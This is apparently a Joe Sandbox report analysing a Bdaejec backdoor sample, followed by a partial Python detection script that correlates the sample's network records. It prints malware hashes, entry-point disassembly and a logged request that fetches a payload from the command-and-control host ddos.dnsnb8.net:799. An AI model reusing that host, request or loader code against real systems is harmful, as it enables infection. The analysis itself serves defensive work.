                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8336
                                        Entropy (8bit):3.70054072950984
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJwV6I6YSYSU9v/7McgmfQzpDG89bWpsfmym:R6lXJS6I6YdSU9v/7gmfQ5WCfa
                                        MD5:AD96E522F143131E476FE4D88787761E
                                        SHA1:AD020E0044E9D9BB391B0322443F3CB679ACE899
                                        SHA-256:B3A07ADC364DF8260F20279F3FF3479E268568078D9EED01BAE74955C7A88A47
                                        SHA-512:580EEBA310D298D2298883144C93467A0532CD8B944F043496457E0FE1B2D63FEEAAF1A8FABAEECD92E84032491055B2A1326ECBB3AAD8246A2718A414B9CE24
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.2.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4579
                                        Entropy (8bit):4.464326652582071
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsNJg77aI99qWpW8VYMYm8M4J+tQNFt+q8gqycSbXrLd:uIjfnI77L7V8J+uVVq7SbrLd
                                        MD5:35B67B13CD35406209427161CC475A0F
                                        SHA1:B4C5A148B622247ED095C64125BC899F9A723214
                                        SHA-256:063909B7346EFE64FD5DAD404F4842C583C4D459445959862741118B8EC3CBF9
                                        SHA-512:69DF1D57F63F6271BC0E7F2C893105B7A26D107FDA7000B4FA9FCDAA64240D20945C6CDAD1297743E46A2B8D444C81DF3604A5D7474DDE25E0A2139D74957AA1
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427194" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Users\user\Desktop\7Y18r(193).exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):15872
                                        Entropy (8bit):7.031075575407894
                                        Encrypted:false
                                        SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                        MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                        SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                        SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                        SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 92%
                                        Joe Sandbox View:
                                         • Filename: 7Y18r(212).exe, Detection: malicious
                                         • Filename: 7Y18r(216).exe.dll, Detection: malicious
                                         • Filename: 7Y18r(223).exe, Detection: malicious
                                         • Filename: builder_Release.exe, Detection: malicious
                                         • Filename: A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe, Detection: malicious
                                         • Filename: BOTBINARY.EXE.exe, Detection: malicious
                                         • Filename: BkPack.exe, Detection: malicious
                                         • Filename: bss.exe, Detection: malicious
                                         • Filename: C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe, Detection: malicious
                                         • Filename: builder_Release.exe, Detection: malicious
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.374849821258931
                                        Encrypted:false
                                        SSDEEP:6144:kFVfpi6ceLP/9skLmb0iyWWSPtaJG8nAge35OlMMhA2AX4WABlguNXiL:kV10yWWI/glMM6kF7Jq
                                        MD5:2E9AE6A6EC6CB61878ED2E4FAE58199A
                                        SHA1:2D018A316F5D83326BD4CF288B05610031AE8028
                                        SHA-256:25C07974C8E2EF0CB44DD769211B62D7CBCD0F2FCEB781A9B587AB101229F161
                                        SHA-512:36E5D41BC68F3E529042FFF333942259C68923017A26DD95BCD92610DF7EA6227C1D393E2EC107DECA615A17F9C4D70EB5554E2AC537EBB9DC3DAE5FBA764C41
                                        Malicious:false
                                        Preview:regfC...C....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.865384550190376
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:7Y18r(193).exe
                                        File size:217'088 bytes
                                        MD5:3a085e2c496b3d2020401c3452b57aef
                                        SHA1:09754968722731fb208ddbebcc6c6a7cc9d42c7b
                                        SHA256:ba12343f978332fa8c76a99e384a9052b0f9ecc1bcf24bd25552832af77a03ef
                                        SHA512:f5bd05a3a87d2eafdc084b5900d69b34bf6270def6c63b3206987c83cd1a5209b5ae14a095729c00b8ca9f424489bcf11b5fc63c0ec89d8b7515765da2d28fb9
                                        SSDEEP:3072:mGmCsSSeDqwOo211BXydq3/CxrLgGolIWWi98mux/Xh0vFF1MY7glCFGCH:tDXDpf2lIq3/mPgaWWD9xKdFd7gUA
                                        TLSH:4724CF2236D48073E27766348B71C2928F27B8769B7198DF2B94096E1E752D2CFB4347
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.U...;...;...;.......;.a.....;.a...+.;.a...R.;.......;...:...;.a.....;.a.....;.a.....;.Rich..;.........PE..L.....$c...........
                                        Icon Hash:0f2c121128222d22
                                        Entrypoint:0x7ba000
                                        Entrypoint Section:Iu9
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6324DD9A [Fri Sep 16 20:33:30 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:cf6c67a92b992938826c4e4ca9230c19
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 0000016Ch
                                        xor eax, eax
                                        push ebx
                                        push esi
                                        push edi
                                        mov dword ptr [ebp-24h], eax
                                        mov dword ptr [ebp-10h], eax
                                        mov dword ptr [ebp-14h], eax
                                        mov dword ptr [ebp-08h], eax
                                        mov dword ptr [ebp-0Ch], eax
                                        mov dword ptr [ebp-20h], eax
                                        mov dword ptr [ebp-18h], eax
                                        mov dword ptr [ebp-48h], 58697557h
                                        mov dword ptr [ebp-44h], 652E534Ch
                                        mov dword ptr [ebp-40h], 00006578h
                                        mov dword ptr [ebp-3Ch], 00000000h
                                        call 00007F85C1304A15h
                                        pop eax
                                        add eax, 00000225h
                                        mov dword ptr [ebp-04h], eax
                                        mov eax, dword ptr fs:[00000030h]
                                        mov dword ptr [ebp-28h], eax
                                        mov eax, dword ptr [ebp-04h]
                                        mov dword ptr [eax], E904C483h
                                        mov eax, dword ptr [ebp-04h]
                                        mov dword ptr [eax+04h], FFC4DFFCh
                                        mov eax, dword ptr [ebp-28h]
                                        mov eax, dword ptr [eax+0Ch]
                                        mov eax, dword ptr [eax+1Ch]
                                        mov eax, dword ptr [eax]
                                        mov eax, dword ptr [eax+08h]
                                        mov ecx, dword ptr [eax+3Ch]
                                        mov ecx, dword ptr [ecx+eax+78h]
                                        add ecx, eax
                                        mov edi, dword ptr [ecx+1Ch]
                                        mov ebx, dword ptr [ecx+20h]
                                        mov esi, dword ptr [ecx+24h]
                                        mov ecx, dword ptr [ecx+18h]
                                        add esi, eax
                                        add edi, eax
                                        add ebx, eax
                                        xor edx, edx
                                        mov dword ptr [ebp-30h], esi
                                        mov dword ptr [ebp-1Ch], edx
                                        mov dword ptr [ebp-34h], ecx
                                        cmp edx, dword ptr [ebp-34h]
                                        jnc 00007F85C1304B5Eh
                                        movzx ecx, word ptr [esi+edx*2]
                                        mov edx, dword ptr [ebx+edx*4]
                                        mov esi, dword ptr [edi+ecx*4]
                                        add edx, eax
                                        mov ecx, dword ptr [edx]
                                        add esi, eax
                                        cmp ecx, 4D746547h
                                        jne 00007F85C1304A64h
                                        cmp dword ptr [edx+04h], 6C75646Fh
                                        jne 00007F85C1304A5Bh
                                        Programming Language:
                                        • [ASM] VS2010 build 30319
                                        • [C++] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [IMP] VS2008 SP1 build 30729
                                        • [RES] VS2010 build 30319
                                        • [LNK] VS2010 build 30319
                                         Name | Virtual Address | Virtual Size | Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17368 | 0xa0 | .text
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b7000 | 0x2cb8 | .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4a70 | 0x40 | .text
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x33c | .text
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                         .text | 0x1000 | 0x176fa | 0x17800 | ccb83befb8420cbf08bebbdb751ab053 | False | 0.5150120511968085 | data | 6.3585335305359685 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                         .data | 0x19000 | 0x39d164 | 0x16400 | a7c79281180313f0f4b5818a21f0b5ab | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                         .rsrc | 0x3b7000 | 0x2cb8 | 0x2e00 | ab5e90b7134f9013677ec329f0e0e3a5 | False | 0.4310461956521739 | data | 4.312487789475691 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         Iu9 | 0x3ba000 | 0x5000 | 0x4200 | 7ec866fb2bcf22856a9e8eb91e3be04d | False | 0.7775213068181818 | data | 6.934398937344117 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                         RT_ICON | 0x3b7220 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland | 0.38537906137184114
                                         RT_ICON | 0x3b7220 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway | 0.38537906137184114
                                         RT_ICON | 0x3b7220 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden | 0.38537906137184114
                                         RT_ICON | 0x3b7ac8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland | 0.4448874296435272
                                         RT_ICON | 0x3b7ac8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway | 0.4448874296435272
                                         RT_ICON | 0x3b7ac8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden | 0.4448874296435272
                                         RT_STRING | 0x3b8de8 | 0x27e | Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0 | Sami Lappish | Finland | 0.47335423197492166
                                         RT_STRING | 0x3b8de8 | 0x27e | Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0 | Sami Lappish | Norway | 0.47335423197492166
                                         RT_STRING | 0x3b8de8 | 0x27e | Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0 | Sami Lappish | Sweden | 0.47335423197492166
                                         RT_STRING | 0x3b9068 | 0x230 | data | Sami Lappish | Finland | 0.48214285714285715
                                         RT_STRING | 0x3b9068 | 0x230 | data | Sami Lappish | Norway | 0.48214285714285715
                                         RT_STRING | 0x3b9068 | 0x230 | data | Sami Lappish | Sweden | 0.48214285714285715
                                         RT_STRING | 0x3b9298 | 0x3c6 | data | Sami Lappish | Finland | 0.453416149068323
                                         RT_STRING | 0x3b9298 | 0x3c6 | data | Sami Lappish | Norway | 0.453416149068323
                                         RT_STRING | 0x3b9298 | 0x3c6 | data | Sami Lappish | Sweden | 0.453416149068323
                                         RT_STRING | 0x3b9660 | 0x460 | data | Sami Lappish | Finland | 0.4473214285714286
                                         RT_STRING | 0x3b9660 | 0x460 | data | Sami Lappish | Norway | 0.4473214285714286
                                         RT_STRING | 0x3b9660 | 0x460 | data | Sami Lappish | Sweden | 0.4473214285714286
                                         RT_STRING | 0x3b9ac0 | 0x1f2 | data | Sami Lappish | Finland | 0.4939759036144578
                                         RT_STRING | 0x3b9ac0 | 0x1f2 | data | Sami Lappish | Norway | 0.4939759036144578
                                         RT_STRING | 0x3b9ac0 | 0x1f2 | data | Sami Lappish | Sweden | 0.4939759036144578
                                         RT_GROUP_ICON | 0x3b8b70 | 0x22 | data | Sami Lappish | Finland | 0.9705882352941176
                                         RT_GROUP_ICON | 0x3b8b70 | 0x22 | data | Sami Lappish | Norway | 0.9705882352941176
                                         RT_GROUP_ICON | 0x3b8b70 | 0x22 | data | Sami Lappish | Sweden | 0.9705882352941176
                                         RT_VERSION | 0x3b8b98 | 0x24c | data | | | 0.5527210884353742
                                        DLL | Import
                                        KERNEL32.dll | WriteConsoleInputW, EnumDateFormatsExW, GetLocaleInfoA, GetDriveTypeW, _llseek, WriteConsoleOutputCharacterA, BuildCommDCBAndTimeoutsA, WriteConsoleOutputW, HeapAlloc, DeleteVolumeMountPointA, InterlockedIncrement, VerSetConditionMask, OpenJobObjectA, GetCommState, GetConsoleAliasA, InterlockedDecrement, GetCurrentProcess, GetSystemWindowsDirectoryW, QueryDosDeviceA, HeapFree, GetEnvironmentStringsW, WriteConsoleInputA, AddConsoleAliasW, CreateHardLinkA, SleepEx, GetFileAttributesExA, _lclose, SetTapeParameters, MoveFileWithProgressA, GetModuleHandleW, CreateNamedPipeW, LocalFlags, FindNextVolumeMountPointA, GetConsoleAliasesA, GetConsoleAliasesLengthA, ConvertFiberToThread, ExpandEnvironmentStringsA, ReadConsoleW, GetConsoleAliasExesW, WaitNamedPipeW, GetUserDefaultLangID, SetCommState, GetCommandLineA, CreateDirectoryExW, GetDriveTypeA, GetVolumePathNameW, GetCurrencyFormatW, ActivateActCtx, GetConsoleCP, GetSystemDirectoryW, SetFileShortNameW, LoadLibraryW, GetConsoleMode, SetCommConfig, _hread, GetCalendarInfoW, GetSystemWindowsDirectoryA, InterlockedPopEntrySList, GetFileAttributesA, GlobalFlags, HeapCreate, EnumSystemCodePagesA, SetTimeZoneInformation, SetSystemPowerState, WritePrivateProfileSectionW, TerminateProcess, ReplaceFileW, GetCompressedFileSizeA, SetThreadContext, CompareStringW, lstrlenW, GlobalUnlock, DisconnectNamedPipe, GetTempPathW, GetNamedPipeHandleStateW, EnumSystemLocalesA, GetPrivateProfileIntW, GetConsoleOutputCP, VerifyVersionInfoW, GlobalUnfix, FindFirstFileA, GetCurrentDirectoryW, GetProcAddress, RemoveDirectoryA, SetComputerNameA, GetProcessVersion, GetPrivateProfileStringA, OpenWaitableTimerA, Process32FirstW, LocalAlloc, IsWow64Process, BuildCommDCBAndTimeoutsW, AddAtomW, CreateEventW, GlobalGetAtomNameW, SetThreadIdealProcessor, FoldStringW, FoldStringA, GlobalFindAtomW, FindNextFileA, _lread, GetModuleHandleA, SetLocaleInfoW, CancelIo, GetProcessAffinityMask, FindNextFileW, GetStringTypeW, WriteProfileStringW, VirtualProtect, GetConsoleCursorInfo, QueryPerformanceFrequency, GetShortPathNameW, SetCalendarInfoA, SetProcessShutdownParameters, OpenSemaphoreW, ReadConsoleInputW, FindAtomW, GetWindowsDirectoryW, DeleteFileW, MoveFileWithProgressW, GetTempPathA, ReadConsoleOutputCharacterW, InterlockedPushEntrySList, TlsFree, EnumSystemLocalesW, GetVolumeInformationW, lstrcpyA, CloseHandle, WriteConsoleW, SetStdHandle, FlushFileBuffers, SetFilePointer, HeapReAlloc, FindFirstFileW, CreateFileA, DebugActiveProcess, GetVolumeNameForVolumeMountPointA, CreateActCtxA, ExitProcess, IsValidLocale, GetUserDefaultLCID, IsValidCodePage, GetOEMCP, GetACP, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, WriteFile, GetStdHandle, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, GetLocaleInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsAlloc, TlsGetValue, TlsSetValue, SetLastError, GetCurrentThreadId, FreeEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, CreateFileW
                                        USER32.dll | CharToOemBuffA, GetDlgCtrlID, GetAltTabInfoW, DrawCaption, CharUpperW
                                        GDI32.dll | GetCharWidthFloatA
                                        ADVAPI32.dll | ClearEventLogA, RevertToSelf, InitiateSystemShutdownA, AbortSystemShutdownW
                                        SHELL32.dll | DragAcceptFiles
                                        ole32.dll | CoGetInstanceFromFile
                                        WINHTTP.dll | WinHttpGetProxyForUrl, WinHttpWriteData, WinHttpReadData, WinHttpOpen
                                        Language of compilation system | Country where language is spoken
                                        Sami Lappish | Finland
                                        Sami Lappish | Norway
                                        Sami Lappish | Sweden
                                        Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                        2024-07-26T02:51:47.771172+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49712 | 13.85.23.86 | 192.168.2.8
                                        2024-07-26T02:51:33.974086+0200 | TCP | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        2024-07-26T02:52:25.910942+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 51996 | 13.85.23.86 | 192.168.2.8
                                        2024-07-26T02:51:31.550495+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        2024-07-26T02:51:30.550429+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        2024-07-26T02:51:33.550629+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        2024-07-26T02:51:29.552802+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jul 26, 2024 02:51:33.580358982 CEST | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        Jul 26, 2024 02:51:33.585237026 CEST | 799 | 49705 | 44.221.84.105 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.585364103 CEST | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        Jul 26, 2024 02:51:33.585599899 CEST | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        Jul 26, 2024 02:51:33.590390921 CEST | 799 | 49705 | 44.221.84.105 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.974029064 CEST | 799 | 49705 | 44.221.84.105 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.974086046 CEST | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        Jul 26, 2024 02:51:33.981743097 CEST | 799 | 49705 | 44.221.84.105 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.981796026 CEST | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        Jul 26, 2024 02:51:40.065602064 CEST | 49705 | 799 | 192.168.2.8 | 44.221.84.105
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jul 26, 2024 02:51:29.552802086 CEST | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        Jul 26, 2024 02:51:30.550429106 CEST | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        Jul 26, 2024 02:51:31.550494909 CEST | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        Jul 26, 2024 02:51:33.550628901 CEST | 54441 | 53 | 192.168.2.8 | 1.1.1.1
                                        Jul 26, 2024 02:51:33.562335014 CEST | 53 | 54441 | 1.1.1.1 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.562350988 CEST | 53 | 54441 | 1.1.1.1 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.562361002 CEST | 53 | 54441 | 1.1.1.1 | 192.168.2.8
                                        Jul 26, 2024 02:51:33.562371016 CEST | 53 | 54441 | 1.1.1.1 | 192.168.2.8
                                        Jul 26, 2024 02:51:48.177746058 CEST | 53 | 64027 | 1.1.1.1 | 192.168.2.8
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Jul 26, 2024 02:51:29.552802086 CEST | 192.168.2.8 | 1.1.1.1 | 0x495f | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false
                                        Jul 26, 2024 02:51:30.550429106 CEST | 192.168.2.8 | 1.1.1.1 | 0x495f | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false
                                        Jul 26, 2024 02:51:31.550494909 CEST | 192.168.2.8 | 1.1.1.1 | 0x495f | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false
                                        Jul 26, 2024 02:51:33.550628901 CEST | 192.168.2.8 | 1.1.1.1 | 0x495f | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Jul 26, 2024 02:51:33.562335014 CEST | 1.1.1.1 | 192.168.2.8 | 0x495f | No error (0) | ddos.dnsnb8.net | (none) | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                                        Jul 26, 2024 02:51:33.562350988 CEST | 1.1.1.1 | 192.168.2.8 | 0x495f | No error (0) | ddos.dnsnb8.net | (none) | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                                        Jul 26, 2024 02:51:33.562361002 CEST | 1.1.1.1 | 192.168.2.8 | 0x495f | No error (0) | ddos.dnsnb8.net | (none) | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                                        Jul 26, 2024 02:51:33.562371016 CEST | 1.1.1.1 | 192.168.2.8 | 0x495f | No error (0) | ddos.dnsnb8.net | (none) | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                                        • ddos.dnsnb8.net:799
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.8 | 49705 | 44.221.84.105 | 799 | 7496 | C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jul 26, 2024 02:51:33.585599899 CEST | 288 | OUT | GET /cj//k1.rar HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: ddos.dnsnb8.net:799
                                        Connection: Keep-Alive
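The DNS answer, the TCP session and the HTTP request above line up into one chain: the dropped Temp executable resolves ddos.dnsnb8.net, connects to the returned address on port 799, and fetches /cj//k1.rar with a Host header that carries the non-standard port. The following Python script is an added example, not part of the Joe Sandbox report: it takes those records (transcribed inline from the tables above so it runs offline), correlates them and emits the indicators a detection engineer would alert on. The port allow-list, the Temp-directory heuristic and the archive-extension check are this script's own assumptions, not thresholds the report states.

```python
"""
Correlate sandbox network records (DNS answer -> TCP session -> HTTP request)
and emit indicators. Added example, not part of the Joe Sandbox report.
The records are transcribed from the report tables above; the port allow-list,
the Temp-directory heuristic and the archive-extension check are assumptions.
"""
import re
from collections import Counter

# Transcribed from the DNS query/answer tables (four identical queries, id 0x495f).
DNS_QUERIES = [
    ("2024-07-26T02:51:29.552", 0x495F, "ddos.dnsnb8.net"),
    ("2024-07-26T02:51:30.550", 0x495F, "ddos.dnsnb8.net"),
    ("2024-07-26T02:51:31.550", 0x495F, "ddos.dnsnb8.net"),
    ("2024-07-26T02:51:33.550", 0x495F, "ddos.dnsnb8.net"),
]
DNS_ANSWERS = [{"name": "ddos.dnsnb8.net", "address": "44.221.84.105", "txid": 0x495F}]

# Transcribed from the HTTP session table.
SESSIONS = [
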